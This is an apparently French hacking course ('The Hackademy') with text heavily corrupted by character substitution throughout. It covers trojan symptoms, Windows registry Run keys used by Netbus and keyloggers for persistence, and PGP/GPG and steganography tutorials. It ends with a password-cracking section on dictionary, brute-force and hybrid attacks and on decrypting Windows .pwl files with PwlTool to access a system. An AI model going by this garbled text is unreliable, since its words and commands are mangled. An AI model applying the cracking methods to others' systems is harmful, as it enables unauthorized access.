$canner #os propres ports .sur l'adresse ) 72J.H.H.70 est aussi tr"s utile ' cette mthode s'a#"re beaucoup plus efficace dans le reprage de trojans que l'utilisation d'un traditionnel anti1#irus... (ais surtout, et c'est ce qu'il y a de plus important, #otre prudence est #otre plus grand facteur de scurit. l e!iste quelques logiciels comme fport .http'33CCC.foundstone.com30 qui #ous permettra de conna`tre les applications qui ou#rent les ports de #otre machine '

$i #ous a#e* pris le temps de le faire, #ous #ous sere* aperGu que $T;99 n'est #isible ni par le gestionnaire de tIches ni dans la barre de tIches. ; ce probl"me, pas de solution miracles. l faut faire appel un logiciel adapt. -ous en a#ons pris un, qui recense tous les processus actifs sur #otre machine .comprene* toutes les applications qui tournent0. Binforce est un utilitaire gratuit, lger et tr"s simple d'utilisation. +ous pourre* le trou#er sur http'33CCC.doCnload.com. 6a fen%tre de gestionnaires d'applications de RinBorce comporte deu! fonctions essentielles '

;ctualiser
DM 1E23441 S!SD"#AM

The Hackademy

Tuer

6a fonction ;ctualiser s'obtient par le bouton bleu en forme de fl"che. $lectionne* l'application fermer et appuye* sur M?illM. 6'application se fermera de force. ;utrement des sries de sympt>mes peu#ent %tre indices qu'un logiciel inconnu tourne en tIche de fond '

6a protection anti#irus du < =$ #ous informe d'un acc"s la *one d'amorGage du disque dur. 6orsque #ous lance* #otre ordinateur, un message #ous indique qu'il ne peut pas dmarrer partir du disque dur. RindoCs refuse de charger les pilotes de disque dur 52 bits. ;u lancement de RindoCs, un message #ous informe qu'un programme T$9 force le dmarrage en mode compatible ($1&=$. $can&isk dtecte des fichiers liaison croises ou d'autre probl"mes. $can&isk indique des secteurs dfectueu! sur les disques durs ou les disquettes. 6a taille des fichiers !cutables augmente subitement. 6a date de cration ou de modification des fichiers comporte des #aleurs errones. +ous constate* que l'ordinateur se bloque frquemment alors que #ous n'a#e* ajout aucun nou#eau composant logiciel ou matriel. 6'ordinateur se bloque et indique une erreur de parit. 6'ordinateur semble %tre plus lent sans raisons apparentes. 6e cla#ier et la souris ne fonctionnent plus de mani"re fiable, m%me apr"s un nettoyage.
DM 1E53441 S!SD"#AM

The Hackademy

&es fichiers ou des dossiers disparaissent de #otre ordinateur de faGon ine!plique. &ans #os documents des mots disparaissent ou s'ajoutent subitement. +otre ordinateur a des ractions impr#ues, #oire de#ient incontr>lable.

Ces sympt>mes sont plus globalement lis l'acti#it de #irus, mais certains d'entre eu! sont rcurrents pour di#ers types d'applications malicieuses. C'est le cas des ralentissement ou des disfonctionnement.

II 9 Initiation D la =ase de re4istre CindoCs


6a base de registre est actuellement le support fondamental sur lequel repose l'!cution de RindoCs. C'est dans cette base de donne que sont entres toutes les #ariables du syst"mes. Certaines #ariables sont plus utiles que d'autres ' certaines dterminent des mots de passe, d'autres des associations au! formats de fichiers, d'autres encore les programme qui dmarrent lors de l'initialisation de RindoCs, etc. l est tr"s facile de manipuler la base de 9egistre, il suffit d'en comprendre le fonctionnement. 8ne fois que #ous aure* bien assimil comment manipuler #otre <&9 .<ase de 9egistre0, #ous pourre*, sans danger, y apporter les modifications dsires.

6'utilitaire de gestion de la <&9 est "e4edit. c'est un utilitaire RindoCs que #ous pou#e* lancer #ia M&marrerM, M,!cuterM puis en tapant regedit.

7 1 $tructure
6a structure de la base de registre est simplissime. Ce sont si! rpertoires racines et des ensembles de sous1rpertoires qui forment des arborescences.

The Hackademy

DM

1E:3441

S!SD"#AM

; #oir la structure de la <&9, en d#eloppant les rpertoires, on se rend tr"s #ite compte de plusieurs choses ' 7. C'est tr"s mal organis 2. l n'y a aucun rep"re 5. Certaines donnes sont incomprhensibles 6a <&9 n'est qu'un ensemble de #ariables au!quelles se rferrent RindoCs et les applications qui y sont installes pour fonctionner. )our les d#eloppeurs nul besoin d'informer l'utilisateur des modifications qui inter#iennent sur la <&9, ni quelles sont ces modifications ou quoi elles ser#ent. 6es rpertoires sont ce qu'on appelle des MclefsM, l'intrieur de ces clefs, se trou#ent des #aleurs. ; ces #aleurs .M-omM tant le nom que l'on attribue la #aleur0 on attribue des #ariables .M&onnesM tant les donnes #ariables d'une #aleur0. l e!iste trois types de #aleurs ' 7. Chaine, laquelle peu#ent %tre rattachs des donnes au format ;$C .tous caract"res0 2. <inaire, laquelle ne peu#ent %tre rattaches que des donnes au format binaire .base 2, des srie de 7 et de H0 5. &R=9&, laquelle ne peu#ent %tre rattaches que des donnes au format dcimal .base 7H0 ou h!adecimal .base 7F0.

Ce sont ces #ariables que se rferrent les logiciels. )ar e!emple le logiciel D #a aller chercher la #aleur MBaireM dans la clef MH?,cXC6;$$,$X9==T3)rogramme DM et #rifier quelle donne lui a t attribue. $i la donne est M=uiM, alors le logiciel D se lancera compl"tement, si cette donne est M-onM, alors le logiciel D se bloquera. C'est tout ce qu'il y a#ait sa#oir contenant la structure de la <&9. !emar"ue # $a %a&eur par d'aut ()D'aut*( "ui est une %a&eur Chaine non d'inie+ se trou%e dans toutes c&e's+ d,s &ors "u-e&&es sont cres.

The Hackademy

DM

1EE3441

S!SD"#AM

2 1 (anipulation
+ous n'a#e* que quatre possibilits au ni#eau de la <&9 ' 7. 2. 5. :.

,ffacer ' des clefs, des #aleurs. Crer ' Crer des clefs et des #aleurs. (odifier ' modifier des donnes, renommer des clefs, ... Transposer des informations de <&9. )our effacer une clef ou une #aleur, slectionne* la et clique* sur M$upprM ou faites un clic droit puis M$upprimerM, ou encore le menu de regedit ' M,ditionM, M$upprimerM, apr"s a#oir slectionn l'lment supprimer. )our crer une clef ou une #aleur, alle* dans la colonne de droite correspondant la clef dans laquelle #ous #oule* crer #os lments, et utilise* le clic droit puis M-ou#eauM ou directement le menu de regedit, par M,ditionM, M-ou#eauM, et choisisse* l'lment crer. )our renommer des clefs ' faites un clic droit sur la clef et choisisse* M9enommerM. des #aleurs ' faites un clic droit sur la #aleur puis choisisse* M9enommerM des donnes .les modifier0 ' faites un clic droit puis M(odifierMou directement un double clic sur les #aleurs dont #ous #oule* modifier les donnes. &ans le cadre des transpositions, pour Copier le nom d'une clef ' faites un clic droit sur une clef et choisisse* MCopier le nom clefM, ou utilise* le menu par M,ditionM, MCopier le nom clefM. Copier une #aleur ou des donnes ' faites M(odifierM et copie* coller le te!te dans les cases respecti#es des #aleurs3donnes.

!emar"ue # &e copiage de c&e's+ de %a&eurs ou de donnes+ ne ser%ent "u-/ &a retransposition de ces donnes textes dans un en%ironnement d-dit de texte. 0ous ne pou%e1 copier une c&e'+ une %a&eur+ comme %ous copie1 un 'ichier courant.

5 1 6es #aleurs ncessaires au dmarrage des applications RindoCs '


+ous le sa#ie* tr"s certainement, certaines applications CindoCs se lancent par l'intermdiaire du menu M&marrerM, M)rogrammesM, M&marrageM. (ais la <&9 et les fichier syst"mes CindoCs sont aussi des lieu! de lancement des applications. ,n effet RindoCs #a #rifier dans certaines clefs fi!es de la <&9, ou certains endroits prcis des fichiers syst"mes de RindoCs, quelles applications il doit lancer. Ces clefs, elles ne sont pas nombreuses ' 7. H?,cXC899,-TX8$,9e$oftCaree(icrosofteRindoCseCurrent+ersione9un 2. H?,cXC899,-TX8$,9e$oftCaree(icrosofteRindoCseCurrent+ersione9unonce 5. H?,cXC899,-TX8$,9e$oftCaree(icrosofteRindoCseCurrent+ersione9unser#ices :. H?,cXC899,-TX8$,9e$oftCaree(icrosofteRindoCseCurrent+ersione9un=nce,! E. H?,cXC899,-TX8$,9e$oftCaree(icrosofteRindoCseCurrent+ersione9un$er#ices=nce F. H?,cX6=C;6X(;CH -,e$oftCaree(icrosofteRindoCseCurrent+ersione9un J. H?,cX6=C;6X(;CH -,e$oftCaree(icrosofteRindoCseCurrent+ersione9un=nce K. H?,cX6=C;6X(;CH -,e$oftCaree(icrosofteRindoCseCurrent+ersione9un=nce,! 4. H?,cX6=C;6X(;CH -,e$oftCaree(icrosofteRindoCseCurrent+ersione9un$er#ices 7H.H?,cX6=C;6X(;CH -,e$oftCaree(icrosofteRindoCseCurrent+ersione9un$er#ices=nce 77.,t ainsi de suite... ; partir des rpertoires racines, il suffit de rechercher l'e!istance d'une clef M9unM ou similaires dans M$oftCaree(icrosofteRindoCseCurrent+ersionM. $i il n'y a pas de clef qui s'y apparente, c'est qu'aucun logiciel n'a tent de crer la clef. ;u ni#eau de ces clefs, #ous a#e* les #aleurs .au! noms des logiciels en
The Hackademy DM 1EF3441 S!SD"#AM

gnral0 qui ont pour donnes le rpertoire oT se trou#e le logiciel lancer.

Ici par exemp&e ce sont IC2 et 345 3essenger "ui se &ancent au dmarrage depuis &es rpertoires o6 i&s ont t insta&&s. +ous pou#e*, par scurit, par confort, ou dans un but nuisible, enle#er des applications trop lourdes au dmarrage ou en rajouter. C'est dans ces clefs que s'installe, par e!emple, -etbus pour s'auto1relancer au dmarrage de RindoCs et c'est dans ces m%mes clefs que s'installent beaucoup d'applications malicieuses .keyloggers entre autres0. )our en sa#oir un petit peu plus sur la <&9 et sa manipulation, notamment sur la fabrication de fichier de <&9 ..bdr0, rferre*1#ous au cours -eCbieb.

The Hackademy

DM

1EJ3441

S!SD"#AM

CHA IT"# 7II Crypto4raphie et st04ano4raphie

I 9 crytpo4raphie E encoda4e
The Hackademy DM 1EK3441 S!SD"#AM

;#ant toute chose, rappelons qu'il y a une distinction qui est ncessaire, incontournable, et que #ous #ous de#e* d'apprendre par coeur. ,lle est simple. ,lle consiste sparer d'une part la cryptographie et d'une autre part l'encodage. ,n effet ces deu! lments sont totalement dissocis. 6'encodage est le processus qui consiste transformer des donnes initiales en d'autres donnes, diffrentes. $upposons que les donnes initiales soient des te!tes. 6'encodage #a modifier ces te!tes, grIce un et un seul algorithme mathmatique, en d'autres te!tes, totalement diffrents. )our retrou#er les te!tes initiau! c'est l'utilisation in#erse du processus mathmatique qui inter#ient. ;insi l'encodage utilise toujours un seul et m%me processus mathmatique pour fonctionner. 6e cryptage, quant lui, utilise des algorithmes diffrents, qui ncessitent une clef. 6es #ieilles mthodes de cyrptage utilisaient une clef unique, pour crypter et dcrypter un message. 6es mthodes actuelles ncessitent deu! clefs '

8ne clef publique ' cette clef est mise en libre acc"s qui le souhaite. &isponible en tlchargement sur des sites, sur des ser#eurs ddis, ou par en#oi d'e1mail, la clef publique est celle qui #a %tre utilise au cryptage des donnes. Ces donnes, une fois crypte, ne s'adressent qu' une, et une seule, personne. Celle possdant la clef pri#e. 8ne clef pri#e ' cette clef permet de dcrypter les messages encrypts l'aide d'une clef publique. 6e processus de dcryptage n'est pas l'in#erse du processus de cryptage, c'est pourquoi il est difficile de dcrypter un message crypt a#ec une clef sans possder l'autre clef. l #a l'encrypter a#ec la clef publique que lui a pass 9aymonde. l #a en#oyer le message ainsi crypt 9aymonde. 9aymonde #a le dcrypter l'aide de sa clef pri#e. 9aymonde #a rpondre 9aoul a#ec la clef publique qu'il lui a passe. 9aymonde #a ainsi en#oyer le message crypte 9aoul. 9aoul #a le dcrypter a#ec sa clef pri#e.

)etit scnario simple. )renons 9aoul et 9aymonde. 9aoul dsire en#oyer un message 9amyonde. 7. 2. 5. :. E. F.

;insi quatre clefs entrent en jeu, soit deu! paires de clefs. Chaque paire a une clef pri#e et une clef publique. (ais attention U $i l'on suit notre e!emple prcdent, il faut bien #oir que jamais 9aoul n'aurait pu dcrypter le message de 9aymonde a#ec une clef pri#e autre que la sienne. )ar ailleurs il n'est pas cens a#oir d'autres clefs pri#es que les siennes. ;insi l'on associe toujours une clef publique, une et une seule, clef pri#e. $ans #ouloir #ous assassiner a#ec un cours historico1mathmatique au sujet de la cryptographie, sache* toutefois que le syst"me #u prcdemment a #u ses bases na`tre grIce Rhitfield &iffie et (artin Hellman. Ce fut ensuite au tour de trois mathmaticiens de gnie, 9i#est $hamir et ;dleman, de mettre au point le syst"me 9$;, premier syst"me de cryptographie moderne, encore tr"s rput. $i la fabuleuse histoire de ces trois mathmaticiens et les calculs mathmatiques #ous intressent, je ne saurais trop #ous recommender de #ous rferre* en fin du cours pour y trou#er des liens utiles. 8n utilitaire tr"s intressant #ous permettra d'appliquer des processus cryptographiques .cryptage, dcryptage, signatures0 de faGon tr"s simple. l s'agit de )@). )@) )Prett7 8ood Pri%ac7* est un outil populaire qui s'adresse au grand public et qui permet bien plus qu'un simple cryptage. 8tilisant diffrents syst"mes de cryptage, cet utilitaire s'a#"re %tre une rfrence. ;ctuellement la #ersion J.H5 en franGais est gratuite. $ur http'33CCC.pgpi.org #ous ne trou#ere* que les derni"res #ersions rcentes, et payantes, de )@). ,n re#anche le projet @)@ .8nuP8+ 9he 85: Pri%ac7 8uard0 permet de d#elopper une #ersion libre de )@), n'utilisant plus l'algorithme &,;. +ous la trou#ere* sur http'33CCC.gnupg.org. 6a
The Hackademy DM 1E43441 S!SD"#AM

diffrence entre les deu! se trou#e certainement au ni#eau de leur practicit. J J J

6es deu! logiciels prsentent les m%mes fonctionnalits. Cependant les allergiques de l'anglais et des lignes de commandes prf"reront nettement )@) son petit fr"re. ;fin de contenter tout le monde, nous e!pliquerons comment utiliser les deu!. J 7. ;pr"s a#oir install )@), lance* )@)Tray. )@)tray #a permettre )@) de rester en application permanente, jusqu' ce que #ous aye* besoin de lui. 2. Baites un clic droit sur )@)tray .le cadenas gris en bas droite dans la barre de tIches0 et lance* )@)tools. 5. 6'interface de )@)tools est tr"s simple. #tape % & Cr0er des clefs K J L 6e premier ic>ne est celui concernant la gestion et la gnration des clefs. 6a cration de clefs est tr"s simple, l'assistant, en franGais, ne fait que simplifier le processus. $i #ous n'en a#e* pas dj cr, #ous pou#e* toujours en crer de nou#elles. 7. &ans les champs M-om completM et M;dresse lectroniqueM entre* un nom d'utilisateur .#ite* d'entrer de #raies informations0, dans Madresse lectroniqueM #ous pou#e* par contre mettre la #>tre. 2. )uis choisisse* le type de clefs que #ous souhaite* crer. &ans notre e!emple nous choisirons 9$;. 5. Choisisse* ensuite la taille de la clef, nous prendrons ici 2H:K bits. $ache* que plus la taille .en bits0 d'une clef est grande, plus grande est sa force. 8ne clef d'une toute petite taille ne garantit qu'une maigre scurit face des mthodes de dcryptage ' c'est une coquille d'oeuf. :. Choisisse* ensuite la date d'e!piration de la paire de clefs. )ermettre une clef d'e!pirer a un a#antage, et un incon#nient. 6'a#antage est que, si #otre clef pri#e est un jour dcou#erte ou #otre cryptage cass, renou#eller #os clefs #ous permettra de communiquer nou#eau sans #ous
The Hackademy DM 1FH3441 S!SD"#AM

soucier de ce fait, car le cryptage que #ous utilisere*, bas sur de nou#elles clefs, n'est pas cass. 6'incon#nient c'est qu'il #ous faudra en#oyer #otre clef publique tout #os correspondants, mettre jour toutes #os *ones de diffusions, etc. l se peut qu'un jour un correspondant #ous en#oye un message crypt a#ec une #ieille clef publique, #ous ne sere* pas m%me de le dcrypter. ;insi pour notre e!emple nous ne prendrons pas de date d'e!piration. E. ,ntre* ensuite une phrase secr"te, qui a pour #aleur de mot de passe. 6e mot MphraseM est cens inciter l'utilisateur rentrer une phrase .soit une longue suite de caract"res0 plut>t qu'un simple mot. 8ne phrase a une plus grande #aleur de scurit qu'un mot. )@) inclut d'ailleurs un indicateur de qualit de la phrase qui doit #ous guider sur le choi! de la longueur de #otre phrase. Cette phrase #ous sera demande lors de l'utilisation de #otre clef pri#e .donc au dcryptage0. Auel intr%t cel a1t1il S $i quelqu'un arri#e copier #otre clef pri#e, il ne pourra pas s'en ser#ir sans le mot de passe adquat. F. ;pr"s que la gnration se soit termine, #ous a#e* la possibilit d'en#oyer #otre clef publique sur un ser#eur de clefs. Cel permettra quelqu'un qui ne connait que #otre adresse e1mail, par e!emple, de #oir si #ous a#e* mis en ligne une clef publique. Ce n'est pas du tout obligatoire. J. 6e processus s'est ache#, #ous #oici en possession de #otre nou#elle paire de clefs .

-ous allons maintenant #oir comment utiliser cette paire de clefs dans le cryptage et le dcryptage de nos donnes. $ache* au pralable que n'importe quel type de donne peut1%tre crypt ' tout ce qui est fichier sur #otre disque dur peu l'%tre. #tape ' & #ncoder et si4ner K J L 6e processus de signature d'un message est simple. l permet 9aymonde de sa#oir que c'est bien 9aoul qui lui a en#oy ces messages crypt a#ec la clef publique de 9aymonde. ,n effet comment 9aymonde pourrait1elle sa#oir si c'est bien 9aoul qui lui en#oye ces messages alors que sa clef publique peut1%tre utilise par n'importe qui S 7. 9aoul #a crypter son message a#ec sa clef pri#e lui, puis a#ec la clef publique de 9aymonde. &onc il y a un double cryptage. 2. 9aymonde #a dcrypter a#ec sa clef pri#e le message encrypt a#ec la clef publique .qui est la sienne0, puis #a redcrypter nou#eau le message a#ec la clef publique de 9aoul car 1 et on ne #ous l'a#ait pas dit pour ne pas sombrer dans la confusion 1 une clef publique peut dcrypter un message encrypt a#ec une clef pri#e, condition bien sur qu'elles soient de la m%me paire. ;insi 9aymonde est sure que les messages pro#iennent bien de 9aoul car elle a pu dcrypter a#ec sa clef publique, le message encrypt a#ec la clef pri#e de 9aoul, qu'il est le seul possder. )@) #ous facilite la tIche ' quelques clics suffisent signer et encrypter ses messages. +oyons cela. 7. Cre* un fichier te!te de tests dans un rpertoire de test.
The Hackademy DM 1F73441 S!SD"#AM

2. -omme* le Mtest.t!tM par e!emple et cri#e*1y une phrase .dans notre e!emple la phrase est Mtest d'encryptageM0, ce que #ous #oudre*. 5. Clique* sur Chi''rer et slectionne* la donne crypter. ci #ous prendre* Mtest.t!tM dans #otre rpertoire MtestM :. Choisisse* les clefs publiques a#ec lesquelles #ous alle* chiffrer #otre message, en les slectionnant et en les faisant glisser #ers les MdestinatairesM. ,n clair il s'agit de slectionner les personnes qui sont destines les donnes cryptes, ceci par slection des clefs publiques adquates. E. +ous pou#e* slectionner plusieurs options ' 4ortie sous 'orme texte .si #ous dsire* que le contenu crypt soit lisible0. Cette option n'a aucune implication sur la scurit de #os donnes. E''acer &-origina& peut %tre une option qui peut1%tre #ue comme une prcaution, car, une fois la donne originale efface, seul la donne crypte subsiste et il n'y a aucune chance pour qui que ce soit d'accder au! donnes en clair, sans a#oir la clef pri#e adquate. 0isua&isation scurise est une option applicable uniquement au! fichiers te!te. 6orsque le destinataire dcryptera #otre donne a#ec sa clef pri#e, le te!te sera ou#ert dans une M#isionneuse de te!te scurisM. Cette #isionneuse affiche un message d'alerte rappelant l'utilisateur que il ne doit lire ce te!te que dans des conditions de scurit et de confidentialit les plus sfres. $i l'utilisateur clique autre part que dans cette #isionneuse, la fen%tre de la #isionneuse se fermera automatiquement.

The Hackademy

DM

1F23441

S!SD"#AM

6'option d'archi%e auto-extracti;&e et de chi''rement con%entionne& ne sont pas des options essentielles. +ous pou#e* toutefois les essayer. )ar e!emple l'option d'archi%e autoextracti;&e #ous permettra de mettre #otre donne sous forme d'un !ecutable qui e!traiera les donnes cryptes. Cette option ne peut1%tre utilise qu'a#ec l'option de chi''rement con%entionne& qui elle, applique une option de chiffrement l'aide d'une phrase qui joue le r>le d'une clef. Cette option est moins sure sur le plan de la scurit de #os donnes, mais ne ncessite pas l'utilisation d'une paire de clefs. ;insi )@) peut utiliser une phrase1clef .qui est la m%me lors du cryptage et du dcryptage0 plut>t qu'un syst"me base de paires de clefs. F. &ans notre e!emple nous ne choisissons que sortie sous 'orme texte comme option. J. Clique* sur M=kM et le cryptage est fait. K. ;lle* dans le rpertoire MtestM pour y #oir #otre fichier crypt en format .asc. +ous pou#e* ou#rir ce fichier comme tant du te!te .renomme* le Mtest2.t!tM par e!emple0. (ais n'oublie* pas de le remettre au format .asc apr"s lecture. ,n effet le format .asc est reconnu par )@). Ceci dit un fichier te!te au format .t!t peut aussi %tre dchiffrable.

4. +oyons maintenant comment signer ses donnes. 9appelons qu'une signature n'est pas obligatoire. 7H.Clique* sur 4igner.

77.Choisisse* le fichier signer, fichier qui a du %tre pralablement crypt. ,tant donn qu'une signature s'effectue a#ec #otre clef pri#e, #ous aure* besoin de saisir #otre phrase secr"te. 72.+ous pou#e* choisir une 4ignature dtache qui cre un fichier .sig qui ne se colle pas au fichier crypt. +ous aure* ainsi deu! fichiers spars ' un fichier crypt, et un fichier signature. -ous n'appliquerons pas cette option. 75.6'option 4ortie sous 'orme texte permet la signature d'%tre lisible en format te!te, tout comme la m%me option qui sert au cryptage. 7:.+ous #alide* a#ec M=kM 7E.6a signature a t faite. +ous pou#e* toutefois faire cette opration en une seule tape grIce au bouton Chi''rer < signer.

#tape ( & Decrypta4e K J L 6e dcryptage des donnes est une chose tr"s simple. )our dcrypter des donnes qui #ous sont adresses .donc on suppose que #ous a#e* la clef pri#e adquate, ou la clef con#entionnelle dans le cas d'un chiffrement con#entionnel0, double1clique* sur le fichier .pgp ou .asc, ou utilise* le bouton ' Dchi''rer < %ri'ier

7. 2. 5. :.

Clique* sur le bouton $lectionne* le fichier dcrypter 9entre* #otre phrase secr"te pour l'utilisation de #otre clef pri#e Choisisse* d'enregistrer le fichier de nou#eau en clair

#tape ) & AFout de clefs pu=li>ues t0l0char40es K J L


The Hackademy DM 1F53441 S!SD"#AM

&ouble1clique* sur le fichier .asc .qui porte les clefs en question0 et choisisse*, grIce la fen%tre qui s'ou#re, les clefs que #ous dsire* importer. 6es deu! autres fonctionnalits de )@) .dtruire et netto7age de &-espace inuti&is0 ne sont pas utiles la cryptographie. 6a premi"re #ous sert dtruire des fichiers, et la seconde

faire un nettoyage de #otre espace disque. <ref, passons maintenant au manuel d'utilisation de @)@. J J -ous #enons de prsenter en dtail comment faire fonctionner )@). l n'est donc pas ncessaire de recommencer de *ro a#ec @)@. ,n effet @)@ fonctionne comme )@) .Cryptage a#ec clef, dcryptage, etc...0. +oyons juste comment procder, par tapes, l'utilisation de @)@ pour une gnration des clefs, une e!portation de celles1ci, un chiffrage, un dchiffrage. #tape % & J0n0ration des clefset aFouts de clefs distantes KJ JL @)@ ne fonctionne que par ligne de commandes, nous allons en tracer les principales. ae ne conseille l'utilisation de @)@ qu' tous ceu! qui maitrisent les syst"mes ligne de commande, et au! courageu!. 7. )asse* en mode ($1&=$ et alle* dans le repertoire oT se trou#e Mgpg.e!eM 2. gpg --gen-ke7 est la commande taper. ,lle #ous lancera dans l'in#ite de cration des clefs de @)@ 5. $ui#e* les instructions .en anglais0 qui dfilent. Ce sont sensiblement les m%mes tapes qu'a#ec )@). :. 8ne fois #otre paire de clefs cre tape* gpg --export =mesc&e's E. Ceci fait, #ous a#e* dans le fichier MmesclefsM, #os clefs publiques pr%tes %tre diffuses. F. )our importer des clefs depuis un fichier de clefs que #ous a#e* tlcharg, utilise* la commande gpg --import nomdu'ichier #tape ' & #ncrypta4e KJ JL )our encrypter un fichier, toujours en ligne de commandes 7. 8tilise* la commande gpg -e test.txt 2. ndique* l'identifiant de la clef publique

The Hackademy

DM

1F:3441

S!SD"#AM

5. 8ne fois l'identifiant rentr, le fichier Mtest.gpgM est cr. #tape ( & D0crypta4e KJ JL &crypter un fichier gpg est tr"s simple. l #ous suffit d'entrer la commande ' gpg test.gpg puis de saisir le mot de passe pour l'utilisation de #otre clef pri#e.

)lus de documentation sur @)@ dans le M9,;&(,M et Mgpg.manM .accessible #ia la commande gpg 11 help0. Toute la documentation est en anglais. !emar"ue # 0ous pou%e1 %ous amuser / comparer di''rents textes en c&air et cr7pts a'in de %oir comment peut %arier un cr7ptage d-apr,s &es di''rentes options "ue %ous choisse1. :ne petite astuce concernant &e cr7ptage de %os donnes. P&ut>t "ue de cr7pter un / un %os 'ichiers sensi;&es+ "ue des gens ma&'aisant pourraient trou%er )&e 4E?9I *+ mette1 &es en un .1ip et encr7pte1 &e 'ichier .1ip contenant toutes %os donnes. 0ous 'ere1 en deux passes une opration "ui peut prendre ;eaucoup de temps.

II 9 St04ano4raphie
The Hackademy DM 1FE3441 S!SD"#AM

&es informations faire passer, des donnes faire circuler S ,t le tout discr"tement S 6a stganographie #ous aidera. Cette mthode consiste cacher des donnes, des informations, dans un support anodin. )ar e!emple, dans la Chine ancienne, on cri#ait des messages sur de la soie fine que l'on roulait en boule a#ant de l'enrober dans de la cire. 8n messager n'a#ait plus qu' a#aler la boule, et faire son #oyage. Baire passer des informations numriques est tout aussi simple. Cacher sa signature dans une image afin que personne ne puisse se l'approprier et en re#endiquer la possession est un jeu d'enfant. (unisse*1#ous tout d'abord d'un logiciel adquat ' un diteur he!adecimal. )our notre e!emple nous choisirons BinH#X, tlchargeable sur http'33CCC.Cinhe!.com. Trou#e* une image pour effectuer #os tests. ci nous prendrons l'image Mtest.jpgM, qui reprsente une soi1 disant empreinte de pas de l'homme ayant march sur la lune.

$-image test.@pg+ &-image sur &a"ue&&e %a se porter nos tra%aux. 7. =u#re* He!edit et faites =u#rir

2. =u#re* #otre image .ou n'importe quel autre type de fichier tant qu'il ne s'agit pas d'une application0 5. +ous de#rie* a#oir ce type de fen%tre

The Hackademy

DM

1FF3441

S!SD"#AM

:. ; gauche se trou#ent la translation He!a&cimale des donnes qui s'affichent droite .et qui sont incomprhensibles0 E. )eu nous importent les donnes He!a&cimales. 9epre* en haut, dans la colonne de droite, les espaces #ides .caractrises par des points qui s'ensui#ent sur plusieurs lignes0 F. C'est dans cette *one que de#ront se porter nos tra#au!. ; la place de ces points, cri#e* un petit mot. ci nous crirons ' stegano, et, tr"s important, ne laisse* jamais d'espaces dans #os messages, mette* y des points. -ote* que cela aurait tout aussi bien pu %tre le nom d'une socit, d'une personne, propritaire des droits de l'image.

The Hackademy

DM

1FJ3441

S!SD"#AM

J. $au#egarde* l'image sous un autre nom .dans le menu ' ?i&e puis 4a%e as0. l est tr"s important de prendre cette prcaution car une mau#aise manipulation peut a#oir des rsultats dsastreu! sur ce type de fichiers. -ous #errons cela apr"s. K. =u#re* de nou#eau l'image afin de #oir si les modifications n'ont pas poses de probl"mes. Apr<s Avant

7. 6'image obtenue s'a#"re %tre l'identique de la premi"re. )ourtant l'une d'elle contient un petit mot. )our s'en assurer il suffit de la rou#rir a#ec RinH,D. !emar"ue # 2ue ce serait-i& pass si &-on a%ait cras des donnes essentie&&es par notre message stgano $-exemp&e par&e tout seu&.

The Hackademy

DM

1FK3441

S!SD"#AM

+ous pourre* trou#er sur nternet di#ers logiciel de stganographie permettant de cacher des informations dans un fichier te!te, une musique, une image ou autres. +ous l'e!emple de $tegano*orus .CCC.telecharger.com0 qui est un logiciel permettant de cacher un petit te!te dans une image apeg dans le but de pou#oir transfrer #otre message de mani"re in#isible. )our cacher #ous message #ous a#e* le choi! en le cryptage sysmtrique, ou asymtrique. &ans l'e!emple ci1desous nous a#ons choisi le cryptage sysmtrique qui utilise donc le m%me mot de passe pour le cryptage et le dcryptage '

&ans cet e!emple, j'ai defini comme mot de passe O monpass P et choisi comme image source O THHCebring2.jpg P. 6'image qui contiendra le message cach, s'appellera O neCfile.jpg P et #oici le rsultat '

Comme on le constate, aucune diffrence l'oeil nu n'est #isible.

The Hackademy

DM

1F43441

S!SD"#AM

CHA IT"# 7III /e crackin4

The Hackademy

DM

1JH3441

S!SD"#AM

I 9 Mu6est ce >ue le crackin4 G


6e cracking peut %tre associ di#erses choses. l e!iste le cracking de softs qui consiste contourner une protection mise au point par des d#eloppeurs pour #iter l'utilisation prolonge ou la copie de logiciels .Crackers0. &ans certains cas le Cracker dsassemble le programme pour en modifier la source .assembleur0 et le recompiler . &e cette mani"re on peut par e!emple enle#er la limitation de temps ou enle#er un nagscreen .un cran qui appara`t a chaque dmarrage0. 6es #rais Crackers sont tr"s respects dans l'underground... l e!iste aussi le cracking de mots de passe, que le hackeur utilise pour retrou#er, contourner, effacer, #isualiser, un pass afin d'accder a un syst"me. C'est cette deu!i"me dfinition du cracking que je #ais essayer de #ous d#elopper dans cette partie de cours.

II 9 /es fichiers assCord


-ous parlerons dans cette section du cracking de fichiers passCord pour di#ers =$. )our commencer, je #ais #ous e!pliquer les 5 mthodes utilises par les softs pour faire du cracking de fichiers )assCord. 6'attaque a#ec dictionnaire Cette attaque est la plus rapide car elle effectue un test de pass en utilisant un fichier dictionnaire .un simple fichier te!te contenant un mot par ligne, les uns a la suite des autres0. )our faire un dictionnaire efficace, il faut rele#er un ma!imum d'informations sur les utilisateurs du ser#eur cible. =n peut trou#er sur internet une multitude de dictionnaires dj tout fait, ainsi que des gnrateurs. 6'attaque par brut force Cette attaque prou#e bien qu'aucuns pass n'est in#iolable UU ,n effet l'attaque par brute force consiste a essayer toutes les combinaisons possibles sui#ant un certains nombre de caract"res. $i le mots de pass a cracker comprend plusieurs caract"res spciau!, chiffres et lettres, il sera plus long a brut forcer qu'un pass ne comprenant que des lettres. ,n bref... une attaque par brut force aboutie toujours, tout est une question de temps... )our diminuer le temps de crack, il faut disposer d'une machine puissante ou m%me plusieurs .attaques distribues0. 6'attaque hybride 6'attaque hybride est le mlange des 2 prcdentes attaques. ,lle utilise un dictionnaire pour la partie principale .e!' crash0 et le brut force pour la partie finale .e!'fr0, ce qui permet de trou#er les pass comment McrashfrM ou Mcrash2:M etc... 7.6es fichiers .pCl de RindoCs4!3(,' 6es fichiers ayant l'e!tension .pCl contiennent #os mots de pass RindoCs, ils se situent dans le rpertoire racine .c'eCindoCs0. <iensur tous les fichiers .pCl sont crypts, #ous pou#e* le #oir si #ous essayer d'en ou#rir un a#ec un diteur de te!te comme notepad par e!emple. .9este* appuyer sur la touche (;a et faites un click droit sur le fichier pour faire appara`tre le menu Mou#rir a#ecM0. Ces fichiers peu#ent contenir les mots des pass de conne!ions, cran de #eille, sessions... )our les dcrypter, il faut utiliser un soft comme )Cltool .http'33soft:you.com3#itas3pCltool.asp0 qui #a se charger de cracker le fichier et nous afficher les pass en clair.

The Hackademy

DM

1J73441

S!SD"#AM

Ci1contre, l'interface principale de )R6tool #F.E.

